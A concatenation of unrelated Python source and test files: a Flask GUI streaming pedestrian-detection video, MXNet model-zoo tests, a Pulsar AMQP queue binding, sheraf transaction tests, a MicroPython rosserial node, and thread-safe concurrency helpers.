with self.assertRaisesRegex(TypeError, 'interval must be a float'):
cping.protocols.Ping('hi')
|
web_gui.py
|
import threading
import time
import cv2 as cv
import numpy as np
from datetime import date
from flask import Flask
from flask import render_template
from flask import Response
from .utils import visualization_utils as vis_util
from tools.objects_post_process import extract_violating_objects
from tools.environment_score import mx_environment_scoring_consider_crowd
category_index = {0: {
"id": 0,
"name": "Pedestrian",
}} # TODO: json file for detector config
class WebGUI:
"""
The Webgui object implements a flask application and acts as an interface for users.
Once it is created it will act as a central application for viewing outputs.
    :param config: A ConfigEngine instance which provides the necessary parameters. Access to any parameter
    is possible by calling its get_section_dict method.
    :param engine_instance: The engine object that processes the video; it exposes the detector (used here to
    read the FPS) and its process_video method is started by this GUI.
"""
def __init__(self, config, engine_instance):
self.config = config
self.__ENGINE_INSTANCE = engine_instance
self._output_frame = None
self._birds_view = None
self._lock = threading.Lock()
self._host = self.config.get_section_dict("App")["Host"]
self._port = int(self.config.get_section_dict("App")["Port"])
self.app = self.create_flask_app()
self._dist_threshold = float(self.config.get_section_dict("PostProcessor")["DistThreshold"])
self._displayed_items = {} # all items here will be used at ui webpage
# TODO: read from config file
file_name = str(date.today()) + '.csv'
self.objects_log = './static/data/objects_log/' + file_name
def update(self, input_frame, nn_out, distances):
"""
Args:
input_frame: uint8 numpy array with shape (img_height, img_width, 3)
            nn_out: a list of dictionaries, each containing a normalized bounding box, e.g.
            {'id': '0-0', 'bbox': [x0, y0, x1, y1], 'score': 0.99 (optional)}, of shape [N, 3] or [N, 2]
distances: a symmetric matrix of normalized distances
Returns:
draw the bounding boxes to an output frame
"""
        # Create a black window for the birds'-eye view; the window size is constant (300, 200, 3)
birds_eye_window = np.zeros((300, 200, 3), dtype="uint8")
        # Prepare the dictionary of bounding boxes and colors for the visualize_boxes_and_labels_on_image_array function
output_dict = vis_util.visualization_preparation(nn_out, distances, self._dist_threshold)
# Draw bounding boxes and other visualization factors on input_frame
vis_util.visualize_boxes_and_labels_on_image_array(
input_frame,
output_dict["detection_boxes"],
output_dict["detection_classes"],
output_dict["detection_scores"],
output_dict["detection_colors"],
category_index,
instance_masks=output_dict.get("detection_masks"),
use_normalized_coordinates=True,
line_thickness=3,
)
# TODO: Implement perspective view for objects
birds_eye_window = vis_util.birds_eye_view(birds_eye_window, output_dict["detection_boxes"],
output_dict["violating_objects"])
try:
self._displayed_items['fps'] = self.__ENGINE_INSTANCE.detector.fps
        except Exception:
            # fps is not implemented for the detector instance
self._displayed_items['fps'] = None
# Put fps to the frame
# region
# -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_-
txt_fps = 'Frames rate = ' + str(self._displayed_items['fps']) + '(fps)' # Frames rate = 95 (fps)
# (0, 0) is the top-left (x,y); normalized number between 0-1
origin = (0.05, 0.93)
vis_util.text_putter(input_frame, txt_fps, origin)
# -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_-
# endregion
# Put environment score to the frame
# region
# -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_-
violating_objects = extract_violating_objects(distances, self._dist_threshold)
env_score = mx_environment_scoring_consider_crowd(len(nn_out), len(violating_objects))
txt_env_score = 'Env Score = ' + str(env_score) # Env Score = 0.7
origin = (0.05, 0.98)
vis_util.text_putter(input_frame, txt_env_score, origin)
# -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_- -_-
# endregion
# Lock the main thread and copy input_frame to output_frame
with self._lock:
self._output_frame = input_frame.copy()
self._birds_view = birds_eye_window.copy()
def create_flask_app(self):
# Create and return a flask instance named 'app'
app = Flask(__name__)
@app.route("/")
def _index():
# Render a html file located at templates as home page
return render_template("index.html")
@app.route("/video_feed")
def video_feed():
# Return the response generated along with the specific media
# Type (mime type)
return Response(
self._generate(1), mimetype="multipart/x-mixed-replace; boundary=frame"
)
@app.route("/birds_view_feed")
def birds_view_feed():
# Return the response generated along with the specific media
# Type (mime type)
return Response(
self._generate(2), mimetype="multipart/x-mixed-replace; boundary=frame"
)
@app.route("/visualize_logs", methods=['GET'])
def visualizer_page():
# Render a html file located at templates as home page
path = [self.objects_log]
return render_template("visualizer.html", csv_path=path)
return app
def _generate(self, out_frame: int):
"""
Args:
            out_frame: which frame to stream; out_frame == 1 yields the encoded camera/video frame,
            otherwise the encoded birds-eye window is yielded
Returns:
Yield and encode output_frame for flask the response object that is used by default in Flask
"""
while True:
with self._lock:
# Check if the output frame is available, otherwise skip
# The iteration of the loop
if self._output_frame is None:
continue
# Encode the frames in JPEG format
(flag, encoded_birds_eye_img) = cv.imencode(".jpeg", self._birds_view)
(flag, encoded_input_img) = cv.imencode(".jpeg", self._output_frame)
# Ensure the frame was successfully encoded
if not flag:
continue
# Yield the output frame in the byte format
encoded_input_frame = (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n" + bytearray(encoded_input_img) + b"\r\n")
encoded_birds_eye_frame = (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n" + bytearray(encoded_birds_eye_img) + b"\r\n")
yield encoded_input_frame if out_frame == 1 else encoded_birds_eye_frame
def _run(self):
self.app.run(
host=self._host, port=self._port, debug=True, threaded=True, use_reloader=False,
)
def start(self):
"""
Start the thread's activity.
        It must be called at most once. It runs the self._run method on a separate thread and starts
        the process_video method of the engine instance.
"""
threading.Thread(target=self._run).start()
time.sleep(1)
# Get video file path from the config
video_path = self.config.get_section_dict("App")["VideoPath"]
self.__ENGINE_INSTANCE.process_video(video_path)
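# ---------------------------------------------------------------------------
# Minimal standalone sketch (not part of the original module) of the
# multipart/x-mixed-replace streaming pattern used by _generate() and the
# /video_feed route above. The solid-gray test frame is an assumption for
# illustration only.
def _mjpeg_demo_app():
    app = Flask("mjpeg_demo")
    def frames():
        frame = np.full((240, 320, 3), 127, dtype="uint8")  # dummy gray frame
        while True:
            ok, jpeg = cv.imencode(".jpeg", frame)
            if not ok:
                continue
            # Each yielded chunk is one JPEG part of the multipart response.
            yield (b"--frame\r\n"
                   b"Content-Type: image/jpeg\r\n\r\n" + bytearray(jpeg) + b"\r\n")
    @app.route("/stream")
    def stream():
        return Response(frames(), mimetype="multipart/x-mixed-replace; boundary=frame")
    return app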
|
test_gluon_model_zoo.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
from mxnet.gluon.model_zoo.vision import get_model
import sys
from common import setup_module, with_seed, teardown_module
import multiprocessing
import pytest
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
@with_seed()
def test_models():
all_models = ['resnet18_v1', 'resnet34_v1', 'resnet50_v1', 'resnet101_v1', 'resnet152_v1',
'resnet18_v2', 'resnet34_v2', 'resnet50_v2', 'resnet101_v2', 'resnet152_v2',
'vgg11', 'vgg13', 'vgg16', 'vgg19',
'vgg11_bn', 'vgg13_bn', 'vgg16_bn', 'vgg19_bn',
'alexnet', 'inceptionv3',
'densenet121', 'densenet161', 'densenet169', 'densenet201',
'squeezenet1.0', 'squeezenet1.1',
'mobilenet1.0', 'mobilenet0.75', 'mobilenet0.5', 'mobilenet0.25',
'mobilenetv2_1.0', 'mobilenetv2_0.75', 'mobilenetv2_0.5', 'mobilenetv2_0.25']
pretrained_to_test = set(['squeezenet1.1'])
for model_name in all_models:
test_pretrain = model_name in pretrained_to_test
model = get_model(model_name, pretrained=test_pretrain, root='model/')
data_shape = (2, 3, 224, 224) if 'inception' not in model_name else (2, 3, 299, 299)
eprint('testing forward for %s' % model_name)
print(model)
if not test_pretrain:
model.collect_params().initialize()
model(mx.nd.random.uniform(shape=data_shape)).wait_to_read()
def parallel_download(model_name):
model = get_model(model_name, pretrained=True, root='./parallel_download')
print(type(model))
@with_seed()
@pytest.mark.skip(reason='MXNet is not yet safe for forking. Tracked in #17782.')
def test_parallel_download():
processes = []
name = 'mobilenetv2_0.25'
for _ in range(10):
p = multiprocessing.Process(target=parallel_download, args=(name,))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
|
bind_amqp.py
|
from galaxy.util import asbool, mask_password_from_url
from pulsar.client import amqp_exchange_factory
from pulsar import manager_endpoint_util
import functools
import threading
import logging
log = logging.getLogger(__name__)
TYPED_PARAMS = {
"amqp_consumer_timeout": lambda val: None if str(val) == "None" else float(val),
"amqp_publish_retry": asbool,
"amqp_publish_retry_max_retries": int,
"amqp_publish_retry_interval_start": int,
"amqp_publish_retry_interval_step": int,
"amqp_publish_retry_interval_max": int,
}
def get_exchange(connection_string, manager_name, conf):
    # HACK: Fixup non-string parameters - ultimately this should reuse spec
    # stuff from Galaxy.
    for param, to_type in TYPED_PARAMS.items():
if param in conf:
val = conf[param]
conf[param] = to_type(val)
pulsar_exchange = amqp_exchange_factory.get_exchange(
connection_string,
manager_name,
conf
)
return pulsar_exchange
def bind_manager_to_queue(manager, queue_state, connection_string, conf):
pulsar_exchange = get_exchange(connection_string, manager.name, conf)
process_setup_messages = functools.partial(__process_setup_message, manager)
process_kill_messages = functools.partial(__process_kill_message, manager)
def drain(callback, name):
__drain(name, queue_state, pulsar_exchange, callback)
log.info("Finished consuming %s queue - no more messages will be processed." % (name))
if conf.get("message_queue_consume", True):
setup_thread = start_setup_consumer(pulsar_exchange, functools.partial(drain, process_setup_messages, "setup"))
kill_thread = start_kill_consumer(pulsar_exchange, functools.partial(drain, process_kill_messages, "kill"))
if hasattr(queue_state, "threads"):
queue_state.threads.extend([setup_thread, kill_thread])
# TODO: Think through job recovery, jobs shouldn't complete until after bind
# has occurred.
def bind_on_status_change(new_status, job_id):
job_id = job_id or 'unknown'
try:
message = "Publishing Pulsar state change with status %s for job_id %s" % (new_status, job_id)
log.debug(message)
payload = manager_endpoint_util.full_status(manager, new_status, job_id)
pulsar_exchange.publish("status_update", payload)
except:
log.exception("Failure to publish Pulsar state change for job_id %s." % job_id)
raise
if conf.get("message_queue_publish", True):
manager.set_state_change_callback(bind_on_status_change)
def __start_consumer(name, exchange, target):
exchange_url = mask_password_from_url(exchange.url)
thread_name = "consume-%s-%s" % (name, exchange_url)
thread = threading.Thread(name=thread_name, target=target)
thread.daemon = False
thread.start()
return thread
start_setup_consumer = functools.partial(__start_consumer, "setup")
start_kill_consumer = functools.partial(__start_consumer, "kill")
def __drain(name, queue_state, pulsar_exchange, callback):
pulsar_exchange.consume(name, callback=callback, check=queue_state)
def __process_kill_message(manager, body, message):
try:
job_id = __client_job_id_from_body(body)
assert job_id, 'Could not parse job id from body: %s' % body
log.debug("Received message in kill queue for Pulsar job id: %s", job_id)
manager.kill(job_id)
except Exception:
log.exception("Failed to kill job.")
message.ack()
def __process_setup_message(manager, body, message):
    job_id = None
    try:
job_id = __client_job_id_from_body(body)
assert job_id, 'Could not parse job id from body: %s' % body
log.debug("Received message in setup queue for Pulsar job id: %s", job_id)
manager_endpoint_util.submit_job(manager, body)
except Exception:
job_id = job_id or 'unknown'
log.exception("Failed to setup job %s obtained via message queue." % job_id)
message.ack()
def __client_job_id_from_body(body):
job_id = body.get("job_id", None)
return job_id
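# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module) of the TYPED_PARAMS
# coercion performed in get_exchange(): string values, as typically read from
# an ini-style config, are converted to their proper Python types in place.
# The sample values below are assumptions for the example only.
def _coerce_params_example():
    conf = {
        "amqp_consumer_timeout": "2.0",
        "amqp_publish_retry": "true",
        "amqp_publish_retry_max_retries": "5",
    }
    for param, to_type in TYPED_PARAMS.items():
        if param in conf:
            conf[param] = to_type(conf[param])
    # conf is now {'amqp_consumer_timeout': 2.0, 'amqp_publish_retry': True,
    #              'amqp_publish_retry_max_retries': 5}
    return conf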
|
test_transactions.py
|
import queue
import threading
import pytest
import sheraf.transactions
import tests
import ZODB.POSException
from tests.utils import conflict
def test_initial_value():
_queue = queue.Queue()
def run(q):
q.put(sheraf.Database.current_connection())
thread = threading.Thread(target=run, args=(_queue,))
thread.start()
thread.join()
assert _queue.get(timeout=0.1) is None
class Book(tests.UUIDAutoModel):
name = sheraf.SimpleAttribute()
class BookRenamer(threading.Thread):
def __init__(self, book_id, name):
super().__init__()
self.queue = queue.Queue()
self._book_id = book_id
self._name = name
def run(self):
try:
self.do_things()
except Exception as exc: # pragma: no cover
self.queue.put(exc)
else:
self.queue.put(None)
def do_things(self):
def _rename():
_book = Book.read(self._book_id)
_book.name = self._name
with sheraf.connection():
sheraf.transactions.attempt(_rename, on_failure=None)
def test_threaded_attempt(sheraf_zeo_database):
nb_threads = 3
with sheraf.connection(commit=True):
_book = Book.create()
_threads = [BookRenamer(_book.id, str(i)) for i in range(nb_threads)]
for _thread in _threads:
_thread.start()
for _thread in _threads:
_thread.join()
exc = _thread.queue.get()
if exc: # pragma: no cover
raise exc
with sheraf.connection():
_book = _book.read(_book.id)
assert _book.name in (str(i) for i in range(nb_threads))
def test_attempt(sheraf_database):
with sheraf.connection():
def _create():
_book = Book.create()
_book.name = "livre"
sheraf.transactions.attempt(_create, on_failure=None)
with sheraf.connection():
[_book] = Book.all()
assert "livre" == _book.name
def test_args_attempt(sheraf_database):
with sheraf.connection():
def _create(arg1, arg2, arg3="", arg4=""):
return arg1 + arg2 + arg3 + arg4
result = sheraf.transactions.attempt(
_create,
args=("foo", "bar"),
kwargs={"arg3": "A", "arg4": "B"},
on_failure=None,
)
with sheraf.connection():
assert "foobarAB" == result
def test_attempt_small_conflict(sheraf_database):
conflict.reset()
with sheraf.connection():
def _create():
_book = Book.create()
_book.name = "livre"
conflict(times=sheraf.transactions.ATTEMPTS - 2)
sheraf.transactions.attempt(_create, on_failure=None)
with sheraf.connection():
[_book] = Book.all()
assert "livre" == _book.name
def test_attempt_multiple_conflicts(sheraf_database):
conflict.reset()
with pytest.raises(ZODB.POSException.ConflictError):
with sheraf.connection():
def _create():
_book = Book.create()
_book.name = "livre"
conflict(times=sheraf.transactions.ATTEMPTS)
sheraf.transactions.attempt(_create, on_failure=None)
with sheraf.connection():
assert not list(Book.all())
def test_attempt_exceptions(sheraf_database):
with pytest.raises(IndexError):
with sheraf.connection():
def _create():
_book = Book.create()
_book.name = "livre"
raise IndexError()
sheraf.transactions.attempt(_create, on_failure=None)
with sheraf.connection():
assert not list(Book.all())
def test_commit(sheraf_database):
with sheraf.connection():
@sheraf.transactions.commit
def _create():
_book = Book.create()
_book.name = "livre"
_create()
with sheraf.connection():
[_book] = Book.all()
assert "livre" == _book.name
def test_commit_small_conflict(sheraf_database):
conflict.reset()
with sheraf.connection():
@sheraf.transactions.commit
def _create():
_book = Book.create()
_book.name = "livre"
conflict(times=sheraf.transactions.ATTEMPTS - 2)
_create()
with sheraf.connection():
[_book] = Book.all()
assert "livre" == _book.name
def test_commit_multiple_conflicts(sheraf_database):
conflict.reset()
with pytest.raises(ZODB.POSException.ConflictError):
with sheraf.connection():
@sheraf.transactions.commit
def _create():
_book = Book.create()
_book.name = "livre"
conflict(times=sheraf.transactions.ATTEMPTS)
_create()
with sheraf.connection():
assert not list(Book.all())
def test_commit_exceptions(sheraf_database):
with pytest.raises(IndexError):
with sheraf.connection():
@sheraf.transactions.commit
def _create():
_book = Book.create()
_book.name = "livre"
raise IndexError()
_create()
with sheraf.connection():
assert not list(Book.all())
|
core.py
|
"""
libraries needed
machine: for uart usage
uio: packet buffer
struct: serlization
_TopicInfo: for topic negotiation
already provided in rosserial_msgs
"""
import machine as m
import uio
import ustruct as struct
from time import sleep, sleep_ms, sleep_us
from rosserial_msgs import TopicInfo
import sys
import os
#for now threads are used, will be changed with asyncio in the future
if sys.platform == "esp32":
import _thread as threading
else:
import threading
#rosserial protocol header
header=[0xff,0xfe]
#class to manage publish and subscribe
#COULD BE CHANGED AFTERWARDS
class NodeHandle(object):
def __init__(self, serial_id, baudrate):
"""
        id: used for topic ids (negotiation)
        advertised_topics: keeps track of already negotiated topics
        subscribing_topics: topics that have been subscribed to are stored here
        serial_id: uart id
        baudrate: baudrate used for serial communication
"""
self.id=101
self.advertised_topics=dict()
self.subscribing_topics=dict()
self.serial_id=serial_id
self.baudrate=baudrate
self.uart = m.UART(self.serial_id, self.baudrate)
self.uart.init(self.baudrate, bits=8, parity=None, stop=1, txbuf=0)
if sys.platform == "esp32":
threading.start_new_thread(self._listen, ())
else:
threading.Thread(target = self._listen).start()
#method to manage and advertise topic
#before publishing or subscribing
def _advertise_topic(self, topic_name, msg, endpoint, buffer_size):
"""
topic_name: eg. (Greet)
msg: message object
endpoint: corresponds to TopicInfo.msg typical topic id values
"""
register=TopicInfo()
register.topic_id=self.id
register.topic_name=topic_name
register.message_type=msg._type
register.md5sum=msg._md5sum
self.advertised_topics[topic_name]=self.id
#id are summed by one
self.id+=1
try:
register.buffer_size=buffer_size
except Exception as e:
print('No buffer size could be defined for topic negotiation.')
#serialization
packet=uio.StringIO()
register.serialize(packet)
#already serialized (packet)
packet=list(packet.getvalue().encode('utf-8'))
length=len(packet)
#both checksums
crclen=[checksum(le(length))]
crcpack=[checksum(le(endpoint)+packet)]
#final packet to be sent
fpacket=header+le(length)+crclen+le(endpoint)+packet+crcpack
self.uart.write(bytearray(fpacket))
def publish(self, topic_name, msg, buffer_size=1024):
if topic_name not in self.advertised_topics:
self._advertise_topic(topic_name, msg, 0, buffer_size)
#same as advertise
packet=uio.StringIO()
msg.serialize(packet)
packet=list(packet.getvalue().encode('utf-8'))
length=len(packet)
topic_id=le(self.advertised_topics.get(topic_name))
crclen=[checksum(le(length))]
crcpack=[checksum(topic_id+packet)]
fpacket=header+le(length)+crclen+topic_id+packet+crcpack
self.uart.write(bytearray(fpacket))
def subscribe(self, topic_name, msgobj, cb, buffer_size=1024):
assert cb is not None, "Subscribe callback is not set"
#subscribing topic attributes are added
self.subscribing_topics[self.id]=[msgobj,cb]
#advertised if not already subscribed
if topic_name not in self.advertised_topics:
msg = msgobj()
self._advertise_topic(topic_name, msg, 1, buffer_size)
def _listen(self):
while True:
try:
flag=self.uart.read(2)
#check header
if flag == b'\xff\xfe':
#get bytes length
lengthbyte = self.uart.read(2)
length = word(list(lengthbyte)[0], list(lengthbyte)[1])
lenchk = self.uart.read(1)
#validate length checksum
lenchecksum = sum(list(lengthbyte)) + ord(lenchk)
if lenchecksum % 256 != 255:
raise ValueError('Length checksum is not right!')
topic_id=list(self.uart.read(2))
inid = word(topic_id[0],topic_id[1])
if inid != 0:
msgdata = self.uart.read(length)
chk = self.uart.read(1)
#validate topic plus msg checksum
datachecksum = sum((topic_id)) + sum(list(msgdata)) + ord(chk)
if datachecksum % 256 == 255:
try:
#incoming object msg initialized
msgobj = self.subscribing_topics.get(inid)[0]
except Exception :
                                print('TX request was made or a message arrived for a topic that is not subscribed.')
#object sent to callback
callback = self.subscribing_topics.get(inid)[1]
fdata = msgobj()
fdata = fdata.deserialize(msgdata)
callback(fdata)
else:
raise ValueError('Message plus Topic ID Checksum is wrong!')
except Exception as e:
                print('No incoming data could be read for subscriptions.')
#functions to be used in class
def word(l, h):
"""
Given a low and high bit, converts the number back into a word.
"""
return (h << 8) + l
#checksum method, receives array
def checksum(arr):
return 255-((sum(arr))%256)
#little-endian method
def le(h):
h &= 0xffff
return [h & 0xff, h >> 8]
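#---------------------------------------------------------------------------
#illustrative sketch (not part of the original module) of the rosserial
#framing used by publish()/_advertise_topic() above: header + little-endian
#length + length checksum + little-endian topic id + payload + payload
#checksum. The payload bytes and topic id below are arbitrary examples.
def frame_packet_example():
    payload = list(b'hello')                    # serialized message bytes
    topic_id = 0                                # e.g. topic negotiation endpoint
    length = len(payload)
    crclen = [checksum(le(length))]             # checksum over the length bytes
    crcpack = [checksum(le(topic_id)+payload)]  # checksum over id + payload
    return header+le(length)+crclen+le(topic_id)+payload+crcpack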
#example code
if __name__ == "__main__":
from std_msgs import String
from uros import NodeHandle
msg=String()
msg.data= 'HiItsMeMario'
node=NodeHandle(2,115200)
while True:
node.publish('greet',msg)
|
concurrent_helper.py
|
"""
A private module that implements concurrency-friendly versions of
queues, dictionaries and counters.
Author: JMJ
"""
import collections
import logging
import time
import threading
import sched
_NO_DEFAULT = object() # To check if an optional parameter was specified in selected method calls
_logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def trace(*args, **kwargs):
"""simply call debug"""
_logger.debug(*args, **kwargs)
#print(*args, **kwargs)
def tracing():
""" Whether to trace or not"""
return True
def critical(*args, **kwargs):
"""Wrapper to log critical error messages"""
_logger.critical(*args, **kwargs)
class AtomicNumber:
"""Supports various atomic operations on numbers
Adapted by JMJ from https://gist.github.com/benhoyt/8c8a8d62debe8e5aa5340373f9c509c7"""
def __init__(self, initial=0):
"""Initialize a new atomic number to given initial value (default 0)."""
self._value = initial
self._lock = threading.Lock()
def next(self):
"""
Atomically increment the counter and return the new value
>>> counter = AtomicNumber(40)
>>> counter.next()
41
>>> counter.next()
42
"""
with self._lock:
self._value += 1
return self._value
def add(self, addend) -> None:
"""
Atomically add {addend} to the counter. Returns nothing.
>>> counter = AtomicNumber(40)
>>> counter.add(2) # returns nothing
>>> counter.value()
42
"""
with self._lock:
self._value += addend
def __repr__(self):
""" Returns string representation of value"""
return repr(self._value)
def value(self):
"""
Returns a snapshot of the number without attempting
to take the internal lock.
>>> counter = AtomicNumber(42)
>>> counter.value()
42
"""
return self._value
class ConcurrentDeque:
"""
A thread-safe deque. It implements a subset of deque methods.
>>> dq = ConcurrentDeque()
>>> dq.appendleft(42)
>>> print(len(dq))
1
>>> print(dq.pop())
42
>>> dq.append(100)
>>> dq.process_all(lambda x: print(x))
100
>>> print(dq.popleft())
100
>>> dq.clear()
>>> print(len(dq))
0
"""
#
# IMPLEMENTATION NOTE: the lock MUST be held for all the calls below,
# even if the GIL guarantees the calls (like self._deque.append) are themselves
# thread safe. This is because iteration over elements in the deque may not
# be able to deal with modifications done by other threads (deque documentation
# does not say that iteration is thread safe)
#
def __init__(self):
"""Initialize a new empty deque"""
self._deque = collections.deque()
self._lock = threading.Lock()
def append(self, x):
"""Add x to the right side of the deque."""
with self._lock:
return self._deque.append(x)
def appendleft(self, x):
"""Add x to the left side of the deque."""
with self._lock:
return self._deque.appendleft(x)
def clear(self):
"""Remove all elements from the deque leaving it with length 0."""
with self._lock:
return self._deque.clear()
def __len__(self):
"""Returns a snapshot of the dequeue length."""
with self._lock:
return len(self._deque)
def pop(self):
"""Remove and return an element from the right side of the deque.
If no elements are present, raises an IndexError."""
with self._lock:
return self._deque.pop()
def popleft(self):
"""Remove and return an element from the left side of the deque.
If no elements are present, raises an IndexError."""
with self._lock:
return self._deque.popleft()
def process_all(self, func):
"""Applies {func} to a snapshot of all elements.
This is a heavyweight function. It makes a temporary
        copy of the entire deque with the deque lock held, but it does not
        keep the lock held when calling {func}. This also means that items
        may have been removed before (or during) the function call, and items
        may have been concurrently added that are not processed."""
with self._lock:
elements = list(self._deque) # Snapshot of entire deque
for x in elements:
func(x)
class ConcurrentDict:
"""A thread-safe dictionary, implementing a subset of dict methods
>>> cd = ConcurrentDict()
>>> cd.set('a', 1)
>>> cd.get('a')
1
>>> cd.set('b', 2)
>>> cd.get('b')
2
>>> len(cd)
2
>>> cd.get('c', 42)
42
>>> cd.process_all(lambda k, y: print(k, y))
a 1
b 2
>>> cd.pop('a')
1
>>> cd.pop('a', 42) # key 'a' is no longer present
42
>>> cd.upsert('b', lambda x: x, 10) # 'b' exists, value is 2
(2, False)
    >>> cd.upsert('e', lambda x: x, 10) # 'e' does not exist yet
(10, True)
>>> cd.remove_instance('e', 11) # shouldn't get deleted
False
>>> cd.get('e')
10
>>> cd.remove_instance('e', 10) # should get deleted
True
>>> cd.get('e') # doesn't exist, so None is returned, which isn't printed
>>> cd.clear()
>>> cd.empty()
True
>>>
"""
#
# IMPLEMENTATION NOTE: the lock MUST be held for all the calls below,
# even if the GIL guarantees the calls (like self._dict.get) are themselves
# thread safe. This is because the dict state must remain unchanged during iteration.
#
def __init__(self):
"""Initialize a new empty deque"""
self._dict = dict()
self._lock = threading.Lock()
def get(self, key, value=None):
"""Return the value for key if key is in the dictionary, else default.
If default is not given, it defaults to None, so that this method never raises a KeyError.
"""
with self._lock:
return self._dict.get(key, value)
def set(self, key, value):
"""Sets the value of key {key} to {value}. The previous value, if any
will be lost. Another option is upsert."""
with self._lock:
self._dict[key] = value
def pop(self, key, default=_NO_DEFAULT):
""" If key is in the dictionary, remove it and return its value,
else return default. If default is not given and key is not in
the dictionary, a KeyError is raised.
"""
with self._lock:
if default is _NO_DEFAULT:
return self._dict.pop(key)
return self._dict.pop(key, default)
def remove_instance(self, key, value) -> bool:
""" Remove ({key}, {value}) the specific instance of {value} is
present, otherwise does nothing. Returns True IFF value was
actually deleted."""
with self._lock:
try:
obj = self._dict[key]
if obj is value:
del self._dict[key]
return True
except KeyError:
pass
return False
def upsert(self, key, valuefunc, *args, **kwargs):
""" Atomically, if there is no value or None associated with {key}, then
        call {valuefunc}(*args, **kwargs) to generate and set a new value 'newvalue' and
return tuple (newvalue, True).
If, on the other hand, there was a non None previous value `prevvalue`, return
(`prevvalue`, False). Thus, the return value is a tuple. The first element is the
new or previous value, and the second element is True if the value was created and
False if the value was preexisting. NOTE: {valuefunc} is called WITHOUT the dictionary lock
being held. There is a small chance that {valuefunc} may be called but the resultant
object discarded. There is also the chance that the previous or newly set value
may be deleted concurrently by another thread before upsert returns.
"""
# Note that if the previous value is None it will be replaced.
# The new value also may potentially be None - if {valuefunc} returns None.
# We don't examine the value returned by {valuefunc}
curvalue = self.get(key) # default is None
created = False
if curvalue is None:
newvalue = valuefunc(*args, **kwargs)
with self._lock:
curvalue = self._dict.get(key)
if curvalue is None:
created = True
curvalue = self._dict[key] = newvalue
# (else we discard newvalue)
return (curvalue, created)
def clear(self):
"""Remove all elements from the dictionary."""
with self._lock:
return self._dict.clear()
def empty(self) -> bool:
"""Returns True if the dictionary is empty at this instant, False otherwise."""
with self._lock:
return not self._dict
def __len__(self):
"""Returns a snapshot of the number of items in the dictionary."""
with self._lock:
return len(self._dict)
def process_all(self, func):
"""Applies {func}(key, value) to a snapshot of all elements.
This is a heavyweight function. It makes a temporary
copy of the entire dqueue with the deque lock held, but it does not
keep the lock held when calling {func}. This also means that it is possible
that items may have been removed (or during) the function call, and items
may have been concurrently added that are not processed.."""
with self._lock:
keys = list(self._dict) # Snapshot of all keys
for key in keys:
val = self._dict.get(key)
if val is not None:
func(key, val)
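# Usage sketch (illustrative, not part of the original module): upsert() used as
# a get-or-create cache. As documented above, the factory may run and have its
# result discarded if another thread wins the race; the key and factory below
# are example assumptions only.
def _concurrent_dict_upsert_demo():
    cache = ConcurrentDict()
    def make_resource(name):
        return {"name": name, "open": True}  # stand-in for something expensive
    first, created = cache.upsert("db", make_resource, "primary")
    again, created_again = cache.upsert("db", make_resource, "primary")
    assert created is True and created_again is False and again is first
    return first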
class EventScheduler:
"""
Each instance manages events scheduled on a single background thread.
>>> scheduler = EventScheduler()
>>> scheduler.start()
>>> x = False
>>> def myevent(): global x; x = True
>>> scheduler.schedule(0.1, myevent)
>>> scheduler.stop(block=True)
>>> print(x)
True
"""
#
# IMPLEMENTATION NOTE: To keep the background thread active - i.e., re-running
    # self._scheduler.run(), the various client-facing calls all signal
# self._event (threading.Event, not to be confused with client events!).
# Lock self._lock is used to atomically check/set the value
# of self._quit, self._event and relevant self._scheduler calls. The
# sequence of signalling the threading event in relation to various
# other calls is quite important. This ensures that:
# (a) a scheduled client event will always be serviced 'immediately' by the
# background thread.
# (b) No client events can sneak in concurrently with `cancel_all` being
# called and risk remaining scheduled in the queue.
# (c) The background thread will always exit 'immediately' after 'cancel_all'
# is called and will not be left waiting in some corner case.
#
def __init__(self):
"""Initialize an EventScheduler."""
self._scheduler = sched.scheduler()
self._lock = threading.Lock()
self._event = threading.Event()
self._cancelevent = threading.Event()
self._event_exception = False
self._thread = None
self._quit = False
def start(self):
"""Starts the scheduler. It starts a background thread in which context
the scheduling is done"""
def threadfn():
done = False
while not done:
try:
prequit = self._quit
delay = self._scheduler.run(blocking=False)
if delay:
# Next event in queue happens in {delay} seconds
if self._cancelevent.wait(delay):
trace("threadfn: CANCELING")
done = True # we are done - abandon the rest
else:
# Nothing in queue
if prequit:
# All done
trace("threadfn: NORMAL EXIT")
done = True
else:
# Queue is empty, let's wait for more
self._event.wait() # wait for more events...
self._event.clear()
except Exception: # pylint: disable=broad-except
self._event_exception = True
# This would log an ERROR message with details about the exception.
                    # By default this prints to stderr, so we get reports of this error
_logger.exception("EventScheduler: Client's threadfn threw exception")
break # Get out of the loop
trace("Exiting threadfn")
with self._lock:
if self._thread:
raise ValueError("Scheduler seems already started")
else:
self._thread = threading.Thread(target=threadfn)
self._thread.daemon = True
self._thread.start()
def schedule(self, delay, func) -> None:
"""Schedule event {func} to run after waiting {delay} from the point this
call was made OR the scheduler was started, whichever happened later."""
with self._lock:
if self._thread and not self._quit and not self._event_exception:
self._scheduler.enter(delay, priority=0, action=func) # will not block
self._event.set() # wake up background thread if necessary
else:
raise ValueError("Cannot schedule event in current state")
def cancel_all(self):
"""Cancel any pending and future events"""
trace("cancel_all: enter")
self._quit = True
self._event.set() # wake up background thread if necessary
self._cancelevent.set() # get out of scheduler.run() if necessary
trace("cancel_all: exit")
def stop(self, block=False):
"""Stop running once all pending events have been scheduled. If {block}
then block until all events are completed. Once stopped, the scheduler
cannot be restarted."""
